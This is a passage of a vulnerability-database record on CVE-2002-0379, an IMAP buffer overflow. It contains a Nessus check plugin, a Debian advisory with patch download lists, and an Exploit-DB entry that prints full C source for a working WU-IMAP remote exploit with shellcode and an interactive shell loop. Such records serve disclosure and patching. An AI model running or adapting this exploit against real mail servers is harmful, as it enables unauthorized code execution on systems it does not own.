which limits the scope of the\nvulnerability somewhat, unless you are a free mail provider or run a\nmail service where users do not already have shell access to the\nsystem.", "modified": "2018-11-15T00:00:00", "published": "2004-07-31T00:00:00", "id": "MANDRAKE_MDKSA-2002-034.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=13940", "title": "Mandrake Linux Security Advisory : imap (MDKSA-2002:034)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2002:034. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(13940);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2002-0379\");\n script_xref(name:\"MDKSA\", value:\"2002:034\");\n\n script_name(english:\"Mandrake Linux Security Advisory : imap (MDKSA-2002:034)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow was discovered in the imap server that could allow a\nmalicious user to run code on the server with the uid and gid of the\nemail owner by constructing a malformed request that would trigger the\nbuffer overflow. However, the user must successfully authenticate to\nthe imap service in order to exploit it, which limits the scope of the\nvulnerability somewhat, unless you are a free mail provider or run a\nmail service where users do not already have shell access to the\nsystem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.archive.org/web/20030216141306/http://online.securityfocus.com:80/archive/1/271958\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imap and / or imap-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:imap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"imap-2000c-4.9mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"imap-devel-2000c-4.9mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"imap-2000c-4.8mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"imap-devel-2000c-4.8mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"imap-2000c-4.7mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"imap-devel-2000c-4.7mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"imap-2000c-7.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"imap-devel-2000c-7.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"imap-2001a-5.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"imap-devel-2001a-5.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T16:28:59", "bulletinFamily": "exploit", "description": "Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2). CVE-2002-0379. Remote exploit for linux platform", "modified": "2002-05-10T00:00:00", "published": "2002-05-10T00:00:00", "id": "EDB-ID:21443", "href": "https://www.exploit-db.com/exploits/21443/", "type": "exploitdb", "title": "Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/4713/info\r\n \r\nWu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.\r\n \r\nThis only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315.\r\n\r\n/*\r\n * 0x3a0x29wuim.c - WU-IMAP 2000.287 (linux/i86) remote exploit\r\n *\r\n * dekadish\r\n *\r\n * 0x3a0x29 crew\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n\r\n#define RETADDR 0x080eb395 /* My Debian 2.2 box */\r\n#define MAILDIR \"/var/spool/mail\"\r\n\r\nchar shellcode[] =\r\n \"\\x55\\x89\\xe5\\x55\\x89\\xe5\\x83\\xec\\x28\\xc6\\x45\\xd8\\x2f\\xc6\\x45\\xdc\"\r\n \"\\x2f\\xc6\\x45\\xd9\\x5f\\xc6\\x45\\xda\\x5a\\xc6\\x45\\xdb\\x5f\\xc6\\x45\\xdd\"\r\n \"\\x5f\\xc6\\x45\\xde\\x5f\\x83\\x45\\xd9\\x03\\x83\\x45\\xda\\x0f\\x83\\x45\\xdb\"\r\n \"\\x0f\\x83\\x45\\xdd\\x14\\x83\\x45\\xde\\x09\\x31\\xc0\\x89\\x45\\xdf\\x89\\x45\"\r\n \"\\xf4\\x8d\\x45\\xd8\\x89\\x45\\xf0\\x83\\xec\\x04\\x8d\\x45\\xf0\\x31\\xd2\\x89\"\r\n \"\\xd3\\x89\\xc1\\x8b\\x45\\xf0\\x89\\xc3\\x31\\xc0\\x83\\xc0\\x0b\\xcd\\x80\\x31\"\r\n \"\\xc0\\x40\\xcd\\x80\";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tint s, i;\r\n\tfd_set fds;\r\n\tchar tmp[2048], buf[1060];\r\n\tchar *target, *login, *pass, *p;\r\n\tstruct sockaddr_in sock;\r\n\tunsigned long retaddr;\r\n\r\n\tfprintf(stderr, \"%s\\n\", \"[The #smile Crew]\");\r\n\tif (argc != 4)\r\n\t{\r\n\t\tfprintf(stderr, \"Usage: %s <Target ip> <Login> <Password>\\n\", argv[0]);\r\n\t\texit(-1);\r\n\t}\r\n\r\n\tretaddr = RETADDR;\r\n\ttarget = argv[1];\r\n\tlogin = argv[2];\r\n\tpass = argv[3];\r\n\r\n\ts = socket(AF_INET, SOCK_STREAM, 0);\r\n\tsock.sin_port = htons(143);\r\n\tsock.sin_family = AF_INET;\r\n\tsock.sin_addr.s_addr = inet_addr(target);\r\n\r\n\tprintf(\"\\nConnecting to %s:143...\", target);\r\n\tfflush(stdout);\r\n\tif ((connect(s, (struct sockaddr *)&sock, sizeof(sock))) < 0)\r\n\t{\r\n\t\tprintf(\"failed\\n\");\r\n\t\texit(-1);\r\n\t}\r\n\telse\r\n\t\trecv(s, tmp, sizeof(tmp), 0);\r\n\r\n\tprintf(\"done\\nLogging in...\");\r\n\tfflush(stdout);\r\n\tsnprintf(tmp, sizeof(tmp), \"A0666 LOGIN %s %s\\n\", login, pass);\r\n\tsend(s, tmp, strlen(tmp), 0);\r\n\trecv(s, tmp, sizeof(tmp), 0);\r\n\r\n\tif (!strstr(tmp, \"completed\"))\r\n\t{\r\n\t\tprintf(\"failed\\n\");\r\n\t\texit(-1);\r\n\t}\r\n\r\n\tprintf(\"done\\nExploiting...\");\r\n\tfflush(stdout);\r\n\r\n\tdprintf(s, \"A0666 SELECT %s/%s\\n\", MAILDIR, login);\r\n\r\n\tmemset(buf, 0x0, sizeof(buf));\r\n\tp = buf;\r\n\tmemset(p, 0x90, 928);\r\n\tp += 928;\r\n\tmemcpy(p, shellcode, 100);\r\n\tp += 100;\r\n\r\n\tfor (i=0; i<6; i++)\r\n\t{\r\n\t\tmemcpy(p, &retaddr, 0x4);\r\n\t\tp += 0x4;\r\n\t}\r\n\r\n\tsnprintf(tmp, sizeof(tmp), \"A0666 PARTIAL 1 BODY[%s] 1 1\\n\", buf);\r\n\tsend(s, tmp, strlen(tmp), 0);\r\n\tdprintf(s, \"A0666 LOGOUT\\n\");\r\n\tsleep(5);\r\n\tprintf(\"done\\n\\n\");\r\n\r\n\tread(s, tmp, sizeof(tmp));\r\n\tdprintf(s, \"uname -a;id;\\n\");\r\n\tmemset(tmp, 0x0, sizeof(tmp));\r\n\r\n\twhile (1)\r\n\t{\r\n\t\tFD_ZERO(&fds);\r\n\t\tFD_SET(s, &fds);\r\n\t\tFD_SET(1, &fds);\r\n\r\n\t\tselect((s+1), &fds, 0, 0, 0);\r\n\r\n\t\tif (FD_ISSET(s, &fds))\r\n\t\t{\r\n\t\t\tif ((i = recv(s, tmp, sizeof(tmp), 0)) < 1)\r\n\t\t\t{\r\n\t\t\t\tfprintf(stderr, \"Connection closed\\n\");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t\twrite(0, tmp, i);\r\n\t\t}\r\n\t\tif (FD_ISSET(1, &fds))\r\n\t\t{\r\n\t\t\ti = read(1, tmp, sizeof(tmp));\r\n\t\t\tsend(s, tmp, i, 0);\r\n\t\t}\r\n\t}\r\n\r\n\treturn;\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21443/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 9055\n[CVE-2002-0379](https://vulners.com/cve/CVE-2002-0379)\nBugtraq ID: 4713\n", "modified": "2002-05-10T00:00:00", "published": "2002-05-10T00:00:00", "id": "OSVDB:790", "href": "https://vulners.com/osvdb/OSVDB:790", "title": "UoW imap BODY Request Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:14:00", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 215-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nDecember 23th, 2002 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : cyrus-imapd\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE Id : CAN-2002-0379\nCERT Advisory : VU#740169\nBugTraq Id : 4713\n\nTimo Sirainen discovered a buffer overflow in the Cyrus IMAP server,\nwhich could be exploited by a remote attacker prior to logging in. A\nmalicious user could craft a request to run commands on the server under\nthe UID and GID of the cyrus server.\n\nFor the current stable distribution (woody) this problem has been\nfixed in version 1.5.19-9.1.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 1.5.19-2.2.\n\nFor the current unstable distribution (sid) this problem has been\nfixed in version 1.5.19-9.10. The cyrus21-imapd packages are not\nvulnerable\n\nWe recommend that you upgrade your cyrus-imapd package.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2.dsc\n Size/MD5 checksum: 681 7ed2dc53009118f622c466c7490910eb\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2.diff.gz\n Size/MD5 checksum: 15807 75de24bbbf6906b2dcbc58ff94480faa\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19.orig.tar.gz\n Size/MD5 checksum: 526190 b789ea3868be439c27b24a8aa6d0b99f\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 42610 042e48cefd32648ad22780b2dd75d3e4\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 570800 37eba3e8c00ceee87637527fda215e90\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 83332 2d5105eebbace38839fe45897898560d\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 165502 58d468b7568031ef6ebfb6d162a87ea2\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 165366 a99934002ff65416f62949b48e161c2d\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_alpha.deb\n Size/MD5 checksum: 78606 5616b0c2232bf237cd62aa79c60a74f6\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 38378 68c99d95c4bc94244aa11531643e752a\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 427770 29731f1cd6ee7a1bc18fd43d21a30d99\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 77060 c3ef8e84ea192e1792811c889b7e64f6\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 130436 f4424382f2945d196ce68d9dfe51ce04\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 126334 290490d751199efae7feb518fe5e209a\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_arm.deb\n Size/MD5 checksum: 59246 55abe9bb680c1bf75a1d8ccda8d5c0ef\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 37840 c86d3b23d50017c4caefebaffaa52c88\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 409216 e03b8b803fdd52b16f0da981a32d7cbd\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 72742 7b41f08a21aab4683c60e0ff0c87f4ad\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 121794 a1afc55e62e68546e1f746bebf215010\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 119050 1b7a6e684ffbf78d244ae1503aa06743\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_i386.deb\n Size/MD5 checksum: 55434 2e532f7b098b8009f8d4ea809bac8e6a\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 36688 0ec453438aeaeb79447e14dff4128b10\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 381676 d9475e923d51d51b447cf5e08e0154a9\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 71470 e51411412275e67040a780d8b14ac193\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 111510 abf765dfa9f400f381d3302e23f2f0d8\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 111542 5a9b7eacc475e4f19013d8a7ee5ef1a5\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_m68k.deb\n Size/MD5 checksum: 52076 ebcd507e26ea1cf0294232f934c665ae\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 38778 853c9e576750c397455c1606253a47bd\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 450088 49c3ed1a6e3dde88d682bb42b478830d\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 77918 9bb9fdc6d905aa1af5273da6a43ae653\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 132520 65ba9534cae7b0d23d2c3da115f8cf88\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 132128 ca7f5069d2c2c4815677091caddbaad9\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_powerpc.deb\n Size/MD5 checksum: 61916 599a2f419306f34f7f954953431c9a5c\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-admin_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 41222 574250cad0e3247980cdc9ede379e166\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-common_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 446538 69beb1f33611a47889ddfba499ae1ac4\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-dev_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 76118 f16a315115d556d8088ac37ededd5b63\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-imapd_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 133154 32aa7a5ed5bf3ae261c79c84bf6107b6\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-nntp_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 129760 b42b8ca439832adef3417198104e3a45\n http://security.debian.org/pool/updates/non-free/c/cyrus-imapd/cyrus-pop3d_1.5.19-2.2_sparc.deb\n Size/MD5 checksum: 61624 53381aaf7b9ca1956e03f0adaa294b66\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1.dsc\n Size/MD5 checksum: 703 03fa333659ba86e1f6a5654c73c0419c\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1.diff.gz\n Size/MD5 checksum: 32580 a3ed203eff5095754b1918a44c72a77f\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19.orig.tar.gz\n Size/MD5 checksum: 526190 b789ea3868be439c27b24a8aa6d0b99f\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 43490 f4db5feda15c26bee8b46767c73ceafb\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 566970 ab7ff32970435317b65a51c67e60e128\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 86188 b5370e5edfb7221c0633331b2efb90ec\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 164276 7b872501ab0ad28b17a68f6a0599b725\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 162140 2402db60ecb922c719bb0ca80ca35097\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_alpha.deb\n Size/MD5 checksum: 77552 dbafea98c34554a93e3e646caf3df8ed\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 39852 11c0f89746e288beae58cc62ca6b97c0\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 437806 6b701e92f2abc07af14b4b9085646809\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 80344 442a643b75fb202d6a0bb9e571487846\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 134270 bd8c9b068c55bdb127ee2e359b7e3f53\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 126702 1187b29da93ea4862c789d852fbf5a5c\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_arm.deb\n Size/MD5 checksum: 59750 3a3caa512cbf65eac17e50faf9e80593\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 38924 bfaab8f6db81dd162081f4c236a4d960\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 416850 42ab62c6c0dcd027f4b6b21b460d1260\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 75634 c151f3ea81e738188cead441a2110c13\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 123420 962e0e7cc9109f34c1768188e16cc72f\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 119822 3161e49d86884f326438d01b1b099bf0\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_i386.deb\n Size/MD5 checksum: 56208 bfdc5c727911f19a43ee75d6de4d0d41\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 48776 4c64370ec2849b6c95ebc44de4cfc291\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 656724 cddf516677920ad5606e87d2609e8521\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 93280 ac7d194234d19aa602de3900117e6620\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 198040 a399fe746566a9a80a57a0596258f0b2\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 192390 e412c82b348b7a784bbac9d7ea1c6f3a\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_ia64.deb\n Size/MD5 checksum: 90216 4ac43c84ed9b9a5fe7e287bf7127e536\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 42166 886143111f6cce37876e12ffabddcfc8\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 484634 dc48dd627b15e2fcb704a68e7c9a38c8\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 83920 dcabdba1473ed8599b4f4acac5e7f7bd\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 145566 d43d7edadce853267d7aa5856760b912\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 141960 3a5ba8eae1f255d90354271c0e6462f3\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_hppa.deb\n Size/MD5 checksum: 65818 8d1969626dc7f19b63aebb99ca37fd81\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 37904 c1881ce09f8855371ccbbe3e24af7ff5\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 387510 b3372c02bc627e71f3c58942676e6c73\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 74290 7d05c013116eef0a9bb67964879e08da\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 113354 86d9e65b7d2d719a42bf3016a2758d4d\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 112042 a56badde3ffa2dab1152575be2b043b1\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-pop3d_1.5.19-9.1_m68k.deb\n Size/MD5 checksum: 52274 794a80d582276a4a5c67c05d98dca50e\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-admin_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 41522 00a7aed0c34fff8c88fc91efd1d9f1a0\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-common_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 481446 772899fac06ed55e62e36ab711e0201e\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-dev_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 83226 20aed297c07c8eec8f4b0ae3891c81d7\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-imapd_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 141616 494b49f1866e2b4849b41d25359178c4\n http://security.debian.org/pool/updates/main/c/cyrus-imapd/cyrus-nntp_1.5.19-9.1_mips.deb\n Size/MD5 checksum: 140252 0db3dcac7dd3762c858234bf5b40bf2a\n 